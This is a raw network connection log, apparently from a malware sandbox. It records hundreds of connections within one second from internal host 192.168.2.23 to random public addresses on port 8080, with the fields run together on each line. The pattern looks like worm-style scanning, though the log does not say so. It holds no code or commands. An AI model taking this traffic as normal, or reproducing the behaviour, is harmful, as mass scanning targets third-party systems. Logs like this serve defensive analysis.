                                                        Apr 14, 2024 16:34:51.797904968 CEST130308080192.168.2.2395.202.206.119
                                                        Apr 14, 2024 16:34:51.797904968 CEST130308080192.168.2.2362.75.212.210
                                                        Apr 14, 2024 16:34:51.797905922 CEST130308080192.168.2.2362.198.221.72
                                                        Apr 14, 2024 16:34:51.797907114 CEST130308080192.168.2.2362.187.109.24
                                                        Apr 14, 2024 16:34:51.797907114 CEST130308080192.168.2.2394.156.9.251
                                                        Apr 14, 2024 16:34:51.797914982 CEST130308080192.168.2.2394.46.221.79
                                                        Apr 14, 2024 16:34:51.797926903 CEST130308080192.168.2.2385.253.3.171
                                                        Apr 14, 2024 16:34:51.797940016 CEST130308080192.168.2.2385.109.186.199
                                                        Apr 14, 2024 16:34:51.797944069 CEST130308080192.168.2.2395.167.95.27
                                                        Apr 14, 2024 16:34:51.798012018 CEST130308080192.168.2.2395.241.252.143
                                                        Apr 14, 2024 16:34:51.798023939 CEST130308080192.168.2.2394.32.46.10
                                                        Apr 14, 2024 16:34:51.798024893 CEST130308080192.168.2.2395.150.46.14
                                                        Apr 14, 2024 16:34:51.798029900 CEST130308080192.168.2.2394.218.179.176
                                                        Apr 14, 2024 16:34:51.798036098 CEST130308080192.168.2.2331.176.216.139
                                                        Apr 14, 2024 16:34:51.798036098 CEST130308080192.168.2.2362.122.107.200
                                                        Apr 14, 2024 16:34:51.798044920 CEST130308080192.168.2.2362.182.151.155
                                                        Apr 14, 2024 16:34:51.798044920 CEST130308080192.168.2.2385.105.14.110
                                                        Apr 14, 2024 16:34:51.798044920 CEST130308080192.168.2.2331.10.77.114
                                                        Apr 14, 2024 16:34:51.798049927 CEST130308080192.168.2.2385.82.83.5
                                                        Apr 14, 2024 16:34:51.798051119 CEST130308080192.168.2.2385.126.88.104
                                                        Apr 14, 2024 16:34:51.798051119 CEST130308080192.168.2.2395.28.237.205
                                                        Apr 14, 2024 16:34:51.798051119 CEST130308080192.168.2.2394.129.10.143
                                                        Apr 14, 2024 16:34:51.798053980 CEST130308080192.168.2.2385.29.181.182
                                                        Apr 14, 2024 16:34:51.798053980 CEST130308080192.168.2.2362.174.186.117
                                                        Apr 14, 2024 16:34:51.798104048 CEST130308080192.168.2.2362.107.13.84
                                                        Apr 14, 2024 16:34:51.798110008 CEST130308080192.168.2.2385.85.152.93
                                                        Apr 14, 2024 16:34:51.798146963 CEST130308080192.168.2.2331.151.180.179
                                                        Apr 14, 2024 16:34:51.798146963 CEST130308080192.168.2.2331.5.171.14
                                                        Apr 14, 2024 16:34:51.798146963 CEST130308080192.168.2.2394.34.53.227
                                                        Apr 14, 2024 16:34:51.798155069 CEST130308080192.168.2.2362.192.82.251
                                                        Apr 14, 2024 16:34:51.798156023 CEST130308080192.168.2.2395.6.231.5
                                                        Apr 14, 2024 16:34:51.798155069 CEST130308080192.168.2.2362.92.248.28
                                                        Apr 14, 2024 16:34:51.798155069 CEST130308080192.168.2.2395.187.248.182
                                                        Apr 14, 2024 16:34:51.798156023 CEST130308080192.168.2.2394.205.96.123
                                                        Apr 14, 2024 16:34:51.798156023 CEST130308080192.168.2.2331.217.192.141
                                                        Apr 14, 2024 16:34:51.798157930 CEST130308080192.168.2.2385.100.13.0
                                                        Apr 14, 2024 16:34:51.798156023 CEST130308080192.168.2.2394.203.245.92
                                                        Apr 14, 2024 16:34:51.798161983 CEST130308080192.168.2.2395.1.149.101
                                                        Apr 14, 2024 16:34:51.798170090 CEST130308080192.168.2.2331.216.195.67
                                                        Apr 14, 2024 16:34:51.798170090 CEST130308080192.168.2.2385.131.124.121
                                                        Apr 14, 2024 16:34:51.798170090 CEST130308080192.168.2.2395.218.3.19
                                                        Apr 14, 2024 16:34:51.798178911 CEST130308080192.168.2.2395.232.47.227
                                                        Apr 14, 2024 16:34:51.798192024 CEST130308080192.168.2.2395.50.78.26
                                                        Apr 14, 2024 16:34:51.798209906 CEST130308080192.168.2.2362.151.119.194
                                                        Apr 14, 2024 16:34:51.798248053 CEST130308080192.168.2.2395.246.225.0
                                                        Apr 14, 2024 16:34:51.798249960 CEST130308080192.168.2.2395.158.86.39
                                                        Apr 14, 2024 16:34:51.798258066 CEST130308080192.168.2.2385.76.130.21
                                                        Apr 14, 2024 16:34:51.798258066 CEST130308080192.168.2.2385.166.180.21
                                                        Apr 14, 2024 16:34:51.798258066 CEST130308080192.168.2.2362.87.50.23
                                                        Apr 14, 2024 16:34:51.798285961 CEST130308080192.168.2.2395.117.15.57
                                                        Apr 14, 2024 16:34:51.798290968 CEST130308080192.168.2.2395.63.50.46
                                                        Apr 14, 2024 16:34:51.798290968 CEST130308080192.168.2.2394.72.56.45
                                                        Apr 14, 2024 16:34:51.798290968 CEST130308080192.168.2.2385.194.35.250
                                                        Apr 14, 2024 16:34:51.798290968 CEST130308080192.168.2.2362.107.222.241
                                                        Apr 14, 2024 16:34:51.798291922 CEST130308080192.168.2.2395.42.29.27
                                                        Apr 14, 2024 16:34:51.798300028 CEST130308080192.168.2.2395.81.5.68
                                                        Apr 14, 2024 16:34:51.798300028 CEST130308080192.168.2.2385.69.123.208
                                                        Apr 14, 2024 16:34:51.798300028 CEST130308080192.168.2.2395.46.132.11
                                                        Apr 14, 2024 16:34:51.798309088 CEST130308080192.168.2.2395.242.206.173
                                                        Apr 14, 2024 16:34:51.798309088 CEST130308080192.168.2.2394.111.63.173
                                                        Apr 14, 2024 16:34:51.798309088 CEST130308080192.168.2.2331.201.46.0
                                                        Apr 14, 2024 16:34:51.798309088 CEST130308080192.168.2.2395.152.48.49
                                                        Apr 14, 2024 16:34:51.798322916 CEST130308080192.168.2.2385.81.98.239
                                                        Apr 14, 2024 16:34:51.798329115 CEST130308080192.168.2.2395.233.49.195
                                                        Apr 14, 2024 16:34:51.798329115 CEST130308080192.168.2.2385.210.69.19
                                                        Apr 14, 2024 16:34:51.798329115 CEST130308080192.168.2.2394.204.137.12
                                                        Apr 14, 2024 16:34:51.798329115 CEST130308080192.168.2.2385.165.135.194
                                                        Apr 14, 2024 16:34:51.798329115 CEST130308080192.168.2.2394.161.94.192
                                                        Apr 14, 2024 16:34:51.798332930 CEST130308080192.168.2.2394.126.172.154
                                                        Apr 14, 2024 16:34:51.798333883 CEST130308080192.168.2.2331.206.11.118
                                                        Apr 14, 2024 16:34:51.798333883 CEST130308080192.168.2.2362.178.178.185
                                                        Apr 14, 2024 16:34:51.798333883 CEST130308080192.168.2.2331.147.68.230
                                                        Apr 14, 2024 16:34:51.798371077 CEST130308080192.168.2.2385.70.119.11
                                                        Apr 14, 2024 16:34:51.798399925 CEST130308080192.168.2.2385.33.129.145
                                                        Apr 14, 2024 16:34:51.798407078 CEST130308080192.168.2.2362.183.104.76
                                                        Apr 14, 2024 16:34:51.798412085 CEST130308080192.168.2.2385.149.159.192
                                                        Apr 14, 2024 16:34:51.798412085 CEST130308080192.168.2.2331.156.125.19
                                                        Apr 14, 2024 16:34:51.798412085 CEST130308080192.168.2.2331.190.143.83
                                                        Apr 14, 2024 16:34:51.798417091 CEST130308080192.168.2.2385.8.16.13
                                                        Apr 14, 2024 16:34:51.798425913 CEST130308080192.168.2.2362.141.206.153
                                                        Apr 14, 2024 16:34:51.798428059 CEST130308080192.168.2.2395.81.53.128
                                                        Apr 14, 2024 16:34:51.798433065 CEST130308080192.168.2.2394.40.82.222
                                                        Apr 14, 2024 16:34:51.798438072 CEST130308080192.168.2.2394.196.87.68
                                                        Apr 14, 2024 16:34:51.798438072 CEST130308080192.168.2.2331.88.241.246
                                                        Apr 14, 2024 16:34:51.798433065 CEST130308080192.168.2.2395.12.28.155
                                                        Apr 14, 2024 16:34:51.798438072 CEST130308080192.168.2.2385.143.79.174
                                                        Apr 14, 2024 16:34:51.798440933 CEST130308080192.168.2.2385.9.173.51
                                                        Apr 14, 2024 16:34:51.798433065 CEST130308080192.168.2.2395.98.80.7
                                                        Apr 14, 2024 16:34:51.798440933 CEST130308080192.168.2.2394.135.74.53
                                                        Apr 14, 2024 16:34:51.798443079 CEST130308080192.168.2.2362.86.28.175
                                                        Apr 14, 2024 16:34:51.798438072 CEST130308080192.168.2.2331.89.138.93
                                                        Apr 14, 2024 16:34:51.798443079 CEST130308080192.168.2.2395.204.125.200
                                                        Apr 14, 2024 16:34:51.798439026 CEST130308080192.168.2.2331.56.61.61
                                                        Apr 14, 2024 16:34:51.798443079 CEST130308080192.168.2.2331.218.188.8
                                                        Apr 14, 2024 16:34:51.798456907 CEST130308080192.168.2.2362.112.117.66
                                                        Apr 14, 2024 16:34:51.798480034 CEST130308080192.168.2.2394.247.86.144
                                                        Apr 14, 2024 16:34:51.798480034 CEST130308080192.168.2.2394.196.116.106
                                                        Apr 14, 2024 16:34:51.798502922 CEST130308080192.168.2.2362.246.188.151
                                                        Apr 14, 2024 16:34:51.798549891 CEST130308080192.168.2.2362.46.133.147
                                                        Apr 14, 2024 16:34:51.798557043 CEST130308080192.168.2.2394.174.225.247
                                                        Apr 14, 2024 16:34:51.798573017 CEST130308080192.168.2.2395.99.209.146
                                                        Apr 14, 2024 16:34:51.798576117 CEST130308080192.168.2.2331.20.2.94
                                                        Apr 14, 2024 16:34:51.798576117 CEST130308080192.168.2.2385.220.116.121
                                                        Apr 14, 2024 16:34:51.798576117 CEST130308080192.168.2.2331.218.208.229
                                                        Apr 14, 2024 16:34:51.798578024 CEST130308080192.168.2.2362.148.163.21
                                                        Apr 14, 2024 16:34:51.798580885 CEST130308080192.168.2.2385.110.148.124
                                                        Apr 14, 2024 16:34:51.798580885 CEST130308080192.168.2.2395.93.242.12
                                                        Apr 14, 2024 16:34:51.798580885 CEST130308080192.168.2.2362.37.108.95
                                                        Apr 14, 2024 16:34:51.798580885 CEST130308080192.168.2.2385.80.141.59
                                                        Apr 14, 2024 16:34:51.798587084 CEST130308080192.168.2.2395.79.44.207
                                                        Apr 14, 2024 16:34:51.798587084 CEST130308080192.168.2.2394.182.115.36
                                                        Apr 14, 2024 16:34:51.798587084 CEST130308080192.168.2.2394.92.216.60
                                                        Apr 14, 2024 16:34:51.798593044 CEST130308080192.168.2.2362.140.27.51
                                                        Apr 14, 2024 16:34:51.798593044 CEST130308080192.168.2.2331.89.24.248
                                                        Apr 14, 2024 16:34:51.798593044 CEST130308080192.168.2.2362.152.121.245
                                                        Apr 14, 2024 16:34:51.798607111 CEST130308080192.168.2.2362.236.3.135
                                                        Apr 14, 2024 16:34:51.798607111 CEST130308080192.168.2.2362.141.148.110
                                                        Apr 14, 2024 16:34:51.798609018 CEST130308080192.168.2.2394.34.188.167
                                                        Apr 14, 2024 16:34:51.798609018 CEST130308080192.168.2.2395.203.217.59
                                                        Apr 14, 2024 16:34:51.798609972 CEST130308080192.168.2.2394.191.112.164
                                                        Apr 14, 2024 16:34:51.798610926 CEST130308080192.168.2.2331.38.89.121
                                                        Apr 14, 2024 16:34:51.798609972 CEST130308080192.168.2.2394.190.230.122
                                                        Apr 14, 2024 16:34:51.798610926 CEST130308080192.168.2.2394.168.21.248
                                                        Apr 14, 2024 16:34:51.798618078 CEST130308080192.168.2.2385.122.180.4
                                                        Apr 14, 2024 16:34:51.798618078 CEST130308080192.168.2.2362.117.235.255
                                                        Apr 14, 2024 16:34:51.798619986 CEST130308080192.168.2.2395.141.160.191
                                                        Apr 14, 2024 16:34:51.798619986 CEST130308080192.168.2.2331.80.6.246
                                                        Apr 14, 2024 16:34:51.798619986 CEST130308080192.168.2.2385.210.255.103
                                                        Apr 14, 2024 16:34:51.798619986 CEST130308080192.168.2.2395.95.186.237
                                                        Apr 14, 2024 16:34:51.798633099 CEST130308080192.168.2.2385.208.53.11
                                                        Apr 14, 2024 16:34:51.798633099 CEST130308080192.168.2.2394.232.245.208
                                                        Apr 14, 2024 16:34:51.798638105 CEST130308080192.168.2.2385.139.146.100
                                                        Apr 14, 2024 16:34:51.798640966 CEST130308080192.168.2.2395.125.189.125
                                                        Apr 14, 2024 16:34:51.798644066 CEST130308080192.168.2.2385.70.101.105
                                                        Apr 14, 2024 16:34:51.798666000 CEST130308080192.168.2.2362.65.247.171
                                                        Apr 14, 2024 16:34:51.798682928 CEST130308080192.168.2.2362.64.178.109
                                                        Apr 14, 2024 16:34:51.798683882 CEST130308080192.168.2.2395.155.211.232
                                                        Apr 14, 2024 16:34:51.798682928 CEST130308080192.168.2.2385.89.206.146
                                                        Apr 14, 2024 16:34:51.798698902 CEST130308080192.168.2.2395.194.163.85
                                                        Apr 14, 2024 16:34:51.798698902 CEST130308080192.168.2.2395.172.212.146
                                                        Apr 14, 2024 16:34:51.798711061 CEST130308080192.168.2.2394.108.77.44
                                                        Apr 14, 2024 16:34:51.798712015 CEST130308080192.168.2.2394.11.95.149
                                                        Apr 14, 2024 16:34:51.800177097 CEST130308080192.168.2.2331.234.243.5
                                                        Apr 14, 2024 16:34:51.800177097 CEST130308080192.168.2.2362.133.22.130
                                                        Apr 14, 2024 16:34:51.800177097 CEST130308080192.168.2.2394.96.119.254
                                                        Apr 14, 2024 16:34:51.800179005 CEST130308080192.168.2.2394.207.190.105
                                                        Apr 14, 2024 16:34:51.800180912 CEST130308080192.168.2.2385.35.152.158
                                                        Apr 14, 2024 16:34:51.800180912 CEST130308080192.168.2.2395.143.136.252
                                                        Apr 14, 2024 16:34:51.800182104 CEST130308080192.168.2.2362.44.198.27
                                                        Apr 14, 2024 16:34:51.800182104 CEST130308080192.168.2.2385.145.2.231
                                                        Apr 14, 2024 16:34:51.800182104 CEST130308080192.168.2.2362.134.102.44
                                                        Apr 14, 2024 16:34:51.800194979 CEST130308080192.168.2.2394.228.190.116
                                                        Apr 14, 2024 16:34:51.800194979 CEST130308080192.168.2.2385.70.158.112
                                                        Apr 14, 2024 16:34:51.800194979 CEST130308080192.168.2.2362.56.180.119
                                                        Apr 14, 2024 16:34:51.800199986 CEST130308080192.168.2.2362.52.28.234
                                                        Apr 14, 2024 16:34:51.800199986 CEST130308080192.168.2.2331.145.119.130
                                                        Apr 14, 2024 16:34:51.800199986 CEST130308080192.168.2.2331.184.119.205
                                                        Apr 14, 2024 16:34:51.800205946 CEST130308080192.168.2.2385.153.43.27
                                                        Apr 14, 2024 16:34:51.800208092 CEST130308080192.168.2.2362.232.183.140
                                                        Apr 14, 2024 16:34:51.800209999 CEST130308080192.168.2.2331.3.10.126
                                                        Apr 14, 2024 16:34:51.800208092 CEST130308080192.168.2.2331.31.5.198
                                                        Apr 14, 2024 16:34:51.800209999 CEST130308080192.168.2.2395.179.206.100
                                                        Apr 14, 2024 16:34:51.800209999 CEST130308080192.168.2.2394.160.229.167
                                                        Apr 14, 2024 16:34:51.800230026 CEST130308080192.168.2.2331.104.177.182
                                                        Apr 14, 2024 16:34:51.800237894 CEST130308080192.168.2.2385.66.174.180
                                                        Apr 14, 2024 16:34:51.800237894 CEST130308080192.168.2.2362.58.234.80
                                                        Apr 14, 2024 16:34:51.800261021 CEST130308080192.168.2.2331.81.180.156
                                                        Apr 14, 2024 16:34:51.800267935 CEST130308080192.168.2.2362.198.244.197
                                                        Apr 14, 2024 16:34:51.800282955 CEST130308080192.168.2.2385.216.253.87
                                                        Apr 14, 2024 16:34:51.800290108 CEST130308080192.168.2.2385.145.158.37
                                                        Apr 14, 2024 16:34:51.800290108 CEST130308080192.168.2.2394.112.198.164
                                                        Apr 14, 2024 16:34:51.800295115 CEST130308080192.168.2.2395.148.115.16
                                                        Apr 14, 2024 16:34:51.800296068 CEST130308080192.168.2.2331.92.207.68
                                                        Apr 14, 2024 16:34:51.800295115 CEST130308080192.168.2.2385.187.234.85
                                                        Apr 14, 2024 16:34:51.800296068 CEST130308080192.168.2.2362.202.235.140
                                                        Apr 14, 2024 16:34:51.800317049 CEST130308080192.168.2.2362.158.213.224
                                                        Apr 14, 2024 16:34:51.800329924 CEST130308080192.168.2.2385.94.205.154
                                                        Apr 14, 2024 16:34:51.800331116 CEST130308080192.168.2.2394.217.168.73
                                                        Apr 14, 2024 16:34:51.800332069 CEST130308080192.168.2.2394.50.3.211
                                                        Apr 14, 2024 16:34:51.800334930 CEST130308080192.168.2.2362.98.61.255
                                                        Apr 14, 2024 16:34:51.800332069 CEST130308080192.168.2.2331.114.174.141
                                                        Apr 14, 2024 16:34:51.800334930 CEST130308080192.168.2.2362.85.148.186
                                                        Apr 14, 2024 16:34:51.800343990 CEST130308080192.168.2.2331.239.165.71
                                                        Apr 14, 2024 16:34:51.800343990 CEST130308080192.168.2.2394.73.165.113
                                                        Apr 14, 2024 16:34:51.800334930 CEST130308080192.168.2.2394.7.208.28
                                                        Apr 14, 2024 16:34:51.800350904 CEST130308080192.168.2.2395.244.38.240
                                                        Apr 14, 2024 16:34:51.800352097 CEST130308080192.168.2.2331.173.49.68
                                                        Apr 14, 2024 16:34:51.800354004 CEST130308080192.168.2.2395.148.44.116
                                                        Apr 14, 2024 16:34:51.800354004 CEST130308080192.168.2.2394.42.105.19
                                                        Apr 14, 2024 16:34:51.800354004 CEST130308080192.168.2.2385.194.78.211
                                                        Apr 14, 2024 16:34:51.800365925 CEST130308080192.168.2.2385.67.175.23
                                                        Apr 14, 2024 16:34:51.800365925 CEST130308080192.168.2.2385.59.158.147
                                                        Apr 14, 2024 16:34:51.800365925 CEST130308080192.168.2.2362.224.233.245
                                                        Apr 14, 2024 16:34:51.800367117 CEST130308080192.168.2.2394.28.34.166
                                                        Apr 14, 2024 16:34:51.800369978 CEST130308080192.168.2.2385.230.100.71
                                                        Apr 14, 2024 16:34:51.800369978 CEST130308080192.168.2.2331.109.182.85
                                                        Apr 14, 2024 16:34:51.800384045 CEST130308080192.168.2.2331.185.181.108
                                                        Apr 14, 2024 16:34:51.800396919 CEST130308080192.168.2.2331.112.4.56
                                                        Apr 14, 2024 16:34:51.800446033 CEST130308080192.168.2.2331.62.122.209
                                                        Apr 14, 2024 16:34:51.800446033 CEST130308080192.168.2.2385.17.236.202
                                                        Apr 14, 2024 16:34:51.800455093 CEST130308080192.168.2.2394.153.217.145
                                                        Apr 14, 2024 16:34:51.800466061 CEST130308080192.168.2.2394.151.89.134
                                                        Apr 14, 2024 16:34:51.800472021 CEST130308080192.168.2.2394.26.131.252
                                                        Apr 14, 2024 16:34:51.800482988 CEST130308080192.168.2.2331.175.138.66
                                                        Apr 14, 2024 16:34:51.800502062 CEST130308080192.168.2.2395.210.118.169
                                                        Apr 14, 2024 16:34:51.800546885 CEST130308080192.168.2.2395.210.97.231
                                                        Apr 14, 2024 16:34:51.800551891 CEST130308080192.168.2.2394.41.189.33
                                                        Apr 14, 2024 16:34:51.800565004 CEST130308080192.168.2.2385.11.227.13
                                                        Apr 14, 2024 16:34:51.800565958 CEST130308080192.168.2.2394.245.69.3
                                                        Apr 14, 2024 16:34:51.800569057 CEST130308080192.168.2.2395.61.61.214
                                                        Apr 14, 2024 16:34:51.800605059 CEST130308080192.168.2.2385.94.244.88
                                                        Apr 14, 2024 16:34:51.800617933 CEST130308080192.168.2.2362.177.197.114
                                                        Apr 14, 2024 16:34:51.800626993 CEST130308080192.168.2.2385.109.134.7
                                                        Apr 14, 2024 16:34:51.800679922 CEST130308080192.168.2.2385.50.184.197
                                                        Apr 14, 2024 16:34:51.800681114 CEST130308080192.168.2.2331.51.109.32
                                                        Apr 14, 2024 16:34:51.800681114 CEST130308080192.168.2.2385.115.152.33
                                                        Apr 14, 2024 16:34:51.800683975 CEST130308080192.168.2.2394.114.95.244
                                                        Apr 14, 2024 16:34:51.800683975 CEST130308080192.168.2.2385.8.118.174
                                                        Apr 14, 2024 16:34:51.800693035 CEST130308080192.168.2.2362.8.125.11
                                                        Apr 14, 2024 16:34:51.800724030 CEST130308080192.168.2.2385.74.249.142
                                                        Apr 14, 2024 16:34:51.800762892 CEST130308080192.168.2.2395.229.141.158
                                                        Apr 14, 2024 16:34:51.800762892 CEST130308080192.168.2.2394.146.91.45
                                                        Apr 14, 2024 16:34:51.800765991 CEST130308080192.168.2.2395.253.10.194
                                                        Apr 14, 2024 16:34:51.800765991 CEST130308080192.168.2.2362.40.200.178
                                                        Apr 14, 2024 16:34:51.800776005 CEST130308080192.168.2.2394.170.80.80
                                                        Apr 14, 2024 16:34:51.800776005 CEST130308080192.168.2.2331.226.228.10
                                                        Apr 14, 2024 16:34:51.800779104 CEST130308080192.168.2.2362.38.238.21
                                                        Apr 14, 2024 16:34:51.800779104 CEST130308080192.168.2.2385.26.103.93
                                                        Apr 14, 2024 16:34:51.800779104 CEST130308080192.168.2.2394.74.245.126
                                                        Apr 14, 2024 16:34:51.800779104 CEST130308080192.168.2.2394.94.131.138
                                                        Apr 14, 2024 16:34:51.800825119 CEST130308080192.168.2.2385.63.200.101
                                                        Apr 14, 2024 16:34:51.800825119 CEST130308080192.168.2.2331.113.101.93
                                                        Apr 14, 2024 16:34:51.800825119 CEST130308080192.168.2.2385.62.5.242
                                                        Apr 14, 2024 16:34:51.800825119 CEST130308080192.168.2.2362.46.179.86
                                                        Apr 14, 2024 16:34:51.800829887 CEST130308080192.168.2.2385.209.179.19
                                                        Apr 14, 2024 16:34:51.800829887 CEST130308080192.168.2.2385.226.64.67
                                                        Apr 14, 2024 16:34:51.800841093 CEST130308080192.168.2.2385.217.202.133
                                                        Apr 14, 2024 16:34:51.800842047 CEST130308080192.168.2.2362.4.49.165
                                                        Apr 14, 2024 16:34:51.800844908 CEST130308080192.168.2.2395.217.149.218
                                                        Apr 14, 2024 16:34:51.800851107 CEST130308080192.168.2.2362.39.67.151
                                                        Apr 14, 2024 16:34:51.800852060 CEST130308080192.168.2.2331.86.146.46
                                                        Apr 14, 2024 16:34:51.800852060 CEST130308080192.168.2.2362.227.248.232
                                                        Apr 14, 2024 16:34:51.800852060 CEST130308080192.168.2.2331.5.187.61
                                                        Apr 14, 2024 16:34:51.800852060 CEST130308080192.168.2.2395.26.246.231
                                                        Apr 14, 2024 16:34:51.800889015 CEST130308080192.168.2.2385.185.124.53
                                                        Apr 14, 2024 16:34:51.800894976 CEST130308080192.168.2.2395.49.137.87
                                                        Apr 14, 2024 16:34:51.800894976 CEST130308080192.168.2.2395.15.31.87
                                                        Apr 14, 2024 16:34:51.800894976 CEST130308080192.168.2.2395.189.216.42
                                                        Apr 14, 2024 16:34:51.800899982 CEST130308080192.168.2.2385.51.193.169
                                                        Apr 14, 2024 16:34:51.800899982 CEST130308080192.168.2.2331.44.253.1
                                                        Apr 14, 2024 16:34:51.800899982 CEST130308080192.168.2.2395.164.111.70
                                                        Apr 14, 2024 16:34:51.800904989 CEST130308080192.168.2.2395.241.149.36
                                                        Apr 14, 2024 16:34:51.800904989 CEST130308080192.168.2.2331.178.98.43
                                                        Apr 14, 2024 16:34:51.800919056 CEST130308080192.168.2.2331.69.41.98
                                                        Apr 14, 2024 16:34:51.800919056 CEST130308080192.168.2.2385.209.46.225
                                                        Apr 14, 2024 16:34:51.800945044 CEST130308080192.168.2.2395.148.229.95
                                                        Apr 14, 2024 16:34:51.800951004 CEST130308080192.168.2.2395.75.44.126
                                                        Apr 14, 2024 16:34:51.800956964 CEST130308080192.168.2.2362.153.217.114
                                                        Apr 14, 2024 16:34:51.800957918 CEST130308080192.168.2.2395.85.146.243
                                                        Apr 14, 2024 16:34:51.800957918 CEST130308080192.168.2.2394.235.43.153
                                                        Apr 14, 2024 16:34:51.800957918 CEST130308080192.168.2.2395.44.164.212
                                                        Apr 14, 2024 16:34:51.800957918 CEST130308080192.168.2.2395.250.112.230
                                                        Apr 14, 2024 16:34:51.800957918 CEST130308080192.168.2.2362.127.197.145
                                                        Apr 14, 2024 16:34:51.800966024 CEST130308080192.168.2.2395.108.176.161
                                                        Apr 14, 2024 16:34:51.800973892 CEST130308080192.168.2.2395.81.111.20
                                                        Apr 14, 2024 16:34:51.800966978 CEST130308080192.168.2.2395.58.188.197
                                                        Apr 14, 2024 16:34:51.800973892 CEST130308080192.168.2.2395.105.0.49
                                                        Apr 14, 2024 16:34:51.800966978 CEST130308080192.168.2.2331.140.46.2
                                                        Apr 14, 2024 16:34:51.800973892 CEST130308080192.168.2.2394.241.177.79
                                                        Apr 14, 2024 16:34:51.800977945 CEST130308080192.168.2.2385.249.23.210
                                                        Apr 14, 2024 16:34:51.800977945 CEST130308080192.168.2.2395.114.185.142
                                                        Apr 14, 2024 16:34:51.800977945 CEST130308080192.168.2.2331.95.92.11
                                                        Apr 14, 2024 16:34:51.801001072 CEST130308080192.168.2.2395.171.24.234
                                                        Apr 14, 2024 16:34:51.801026106 CEST130308080192.168.2.2394.71.202.22
                                                        Apr 14, 2024 16:34:51.801028013 CEST130308080192.168.2.2385.198.189.167
                                                        Apr 14, 2024 16:34:51.801028967 CEST130308080192.168.2.2362.246.136.78
                                                        Apr 14, 2024 16:34:51.801028967 CEST130308080192.168.2.2331.233.124.227
                                                        Apr 14, 2024 16:34:51.801029921 CEST130308080192.168.2.2395.179.15.83
                                                        Apr 14, 2024 16:34:51.801029921 CEST130308080192.168.2.2362.33.36.238
                                                        Apr 14, 2024 16:34:51.801029921 CEST130308080192.168.2.2394.89.255.94
                                                        Apr 14, 2024 16:34:51.801034927 CEST130308080192.168.2.2385.94.165.204
                                                        Apr 14, 2024 16:34:51.801034927 CEST130308080192.168.2.2362.19.168.150
                                                        Apr 14, 2024 16:34:51.801035881 CEST130308080192.168.2.2395.176.29.103
                                                        Apr 14, 2024 16:34:51.801048040 CEST130308080192.168.2.2331.239.234.53
                                                        Apr 14, 2024 16:34:51.801048040 CEST130308080192.168.2.2394.18.170.121
                                                        Apr 14, 2024 16:34:51.801075935 CEST130308080192.168.2.2331.4.209.173
                                                        Apr 14, 2024 16:34:51.801105976 CEST130308080192.168.2.2362.74.245.1
                                                        Apr 14, 2024 16:34:51.801115036 CEST130308080192.168.2.2394.228.71.125
                                                        Apr 14, 2024 16:34:51.801163912 CEST130308080192.168.2.2385.90.221.237
                                                        Apr 14, 2024 16:34:51.801167965 CEST130308080192.168.2.2362.42.24.160
                                                        Apr 14, 2024 16:34:51.801167965 CEST130308080192.168.2.2395.194.145.88
                                                        Apr 14, 2024 16:34:51.801167965 CEST130308080192.168.2.2394.107.182.115
                                                        Apr 14, 2024 16:34:51.801186085 CEST130308080192.168.2.2331.71.205.82
                                                        Apr 14, 2024 16:34:51.801201105 CEST130308080192.168.2.2394.189.36.251
                                                        Apr 14, 2024 16:34:51.801214933 CEST130308080192.168.2.2385.7.192.47
                                                        Apr 14, 2024 16:34:51.801218987 CEST130308080192.168.2.2395.1.166.64
                                                        Apr 14, 2024 16:34:51.801299095 CEST130308080192.168.2.2331.159.156.125
                                                        Apr 14, 2024 16:34:51.801299095 CEST130308080192.168.2.2385.183.214.34
                                                        Apr 14, 2024 16:34:51.801300049 CEST130308080192.168.2.2362.127.238.6
                                                        Apr 14, 2024 16:34:51.801300049 CEST130308080192.168.2.2395.114.177.9
                                                        Apr 14, 2024 16:34:51.801309109 CEST130308080192.168.2.2385.52.188.233
                                                        Apr 14, 2024 16:34:51.801309109 CEST130308080192.168.2.2385.103.82.245
                                                        Apr 14, 2024 16:34:51.801312923 CEST130308080192.168.2.2385.252.110.194
                                                        Apr 14, 2024 16:34:51.801312923 CEST130308080192.168.2.2394.183.128.202
                                                        Apr 14, 2024 16:34:51.801316023 CEST130308080192.168.2.2331.255.65.184
                                                        Apr 14, 2024 16:34:51.801316023 CEST130308080192.168.2.2395.255.125.124
                                                        Apr 14, 2024 16:34:51.801318884 CEST130308080192.168.2.2385.139.169.240
                                                        Apr 14, 2024 16:34:51.801325083 CEST130308080192.168.2.2362.117.114.124
                                                        Apr 14, 2024 16:34:51.801325083 CEST130308080192.168.2.2385.19.38.237
                                                        Apr 14, 2024 16:34:51.801336050 CEST130308080192.168.2.2394.102.217.201
                                                        Apr 14, 2024 16:34:51.801337957 CEST130308080192.168.2.2362.198.107.35
                                                        Apr 14, 2024 16:34:51.801340103 CEST130308080192.168.2.2395.156.144.255
                                                        Apr 14, 2024 16:34:51.801342010 CEST130308080192.168.2.2331.204.248.146
                                                        Apr 14, 2024 16:34:51.801342010 CEST130308080192.168.2.2331.241.67.18
                                                        Apr 14, 2024 16:34:51.801346064 CEST130308080192.168.2.2395.215.55.84
                                                        Apr 14, 2024 16:34:51.801346064 CEST130308080192.168.2.2394.153.37.66
                                                        Apr 14, 2024 16:34:51.801346064 CEST130308080192.168.2.2385.245.68.203
                                                        Apr 14, 2024 16:34:51.801348925 CEST130308080192.168.2.2385.137.76.166
                                                        Apr 14, 2024 16:34:51.801356077 CEST130308080192.168.2.2331.43.112.37
                                                        Apr 14, 2024 16:34:51.801356077 CEST130308080192.168.2.2331.226.8.12
                                                        Apr 14, 2024 16:34:51.801356077 CEST130308080192.168.2.2385.217.141.4
                                                        Apr 14, 2024 16:34:51.801382065 CEST130308080192.168.2.2394.118.116.166
                                                        Apr 14, 2024 16:34:51.801403046 CEST130308080192.168.2.2385.98.39.150
                                                        Apr 14, 2024 16:34:51.801419020 CEST130308080192.168.2.2394.31.126.255
                                                        Apr 14, 2024 16:34:51.801420927 CEST130308080192.168.2.2385.90.109.69
                                                        Apr 14, 2024 16:34:51.801426888 CEST130308080192.168.2.2331.154.43.159
                                                        Apr 14, 2024 16:34:51.801426888 CEST130308080192.168.2.2395.196.21.132
                                                        Apr 14, 2024 16:34:51.801429987 CEST130308080192.168.2.2331.254.177.55
                                                        Apr 14, 2024 16:34:51.801436901 CEST130308080192.168.2.2385.30.187.17
                                                        Apr 14, 2024 16:34:51.801443100 CEST130308080192.168.2.2362.195.29.119
                                                        Apr 14, 2024 16:34:51.801445007 CEST130308080192.168.2.2385.2.197.85
                                                        Apr 14, 2024 16:34:51.801446915 CEST130308080192.168.2.2395.83.225.208
                                                        Apr 14, 2024 16:34:51.801445007 CEST130308080192.168.2.2395.55.27.101
